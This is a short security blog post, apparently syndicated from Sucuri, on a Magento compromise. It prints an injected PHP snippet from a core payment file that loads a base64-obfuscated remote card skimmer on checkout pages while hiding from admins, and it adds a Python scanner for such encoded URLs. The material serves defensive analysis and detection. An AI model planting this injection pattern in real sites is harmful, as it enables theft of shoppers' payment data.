Magento PHP Injection Loads JavaScript Skimmer

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php

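...
// Run only on GET requests...
if ($_SERVER["REQUEST_METHOD"] === "GET"){
    // ...whose URI contains the one-step checkout path...
    if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
        // ...and only when no "adminhtml" cookie is present.
        if(!isset($_COOKIE["adminhtml"])){
            // Fetch the base64-encoded URL and echo the response into the page.
            echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
        }
    }
}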

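To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents, and the URL is obfuscated with base64. The surrounding conditions narrow when the injection fires: only on GET requests whose URI contains /onestepcheckout/index/, and only when the request carries no adminhtml cookie.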
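One way to hunt for this pattern across a Magento docroot, as an added example that is not part of the original post: decode every string literal passed to base64_decode in PHP files and flag those that decode to a URL. The function names and the sample input (with the placeholder host cdn.example.test) are constructed for illustration.

```python
import base64
import binascii
import re
from pathlib import Path

# base64_decode("...") or base64_decode('...') called with a string literal
B64_CALL = re.compile(r"""base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=]{8,})\1\s*\)""")
# PHP constructs that can pull remote content from a decoded URL
FETCHERS = re.compile(r"\b(file_get_contents|curl_init|fopen|readfile|include|require)\b")
URL_LIKE = re.compile(r"^(https?:)?//", re.I)

def decode_literal(literal):
    """Return the decoded text, or None if it is not valid base64 / UTF-8."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def scan_source(text):
    """Return (line_no, decoded_url, fetcher_on_same_line) per suspicious literal."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for match in B64_CALL.finditer(line):
            decoded = decode_literal(match.group(2))
            if decoded and URL_LIKE.match(decoded):
                # The fetcher check is per line; a call split across
                # lines is still reported, with the flag set to False.
                findings.append((line_no, decoded, bool(FETCHERS.search(line))))
    return findings

def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for hits only."""
    results = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results

# Constructed sample: one benign base64 literal, one encoded URL passed to a fetcher.
_b64 = base64.b64encode(b"https://cdn.example.test/lib.js").decode()
SAMPLE = ("<?php\n$greeting = base64_decode('aGVsbG8gd29ybGQ=');\n"
          f'echo file_get_contents(base64_decode("{_b64}"));\n')

if __name__ == "__main__":
    for line_no, url, fetched in scan_source(SAMPLE):
        print(f"line {line_no}: decodes to {url} (remote fetch on line: {fetched})")
```

A hit in a core file such as a payment model is worth comparing against a clean copy of the same Magento release before the line is removed.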

Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.

The post Magento PHP Injection Loads JavaScript Skimmer appeared first on Security Boulevard.

Article Link: https://securityboulevard.com/2021/01/magento-php-injection-loads-javascript-skimmer/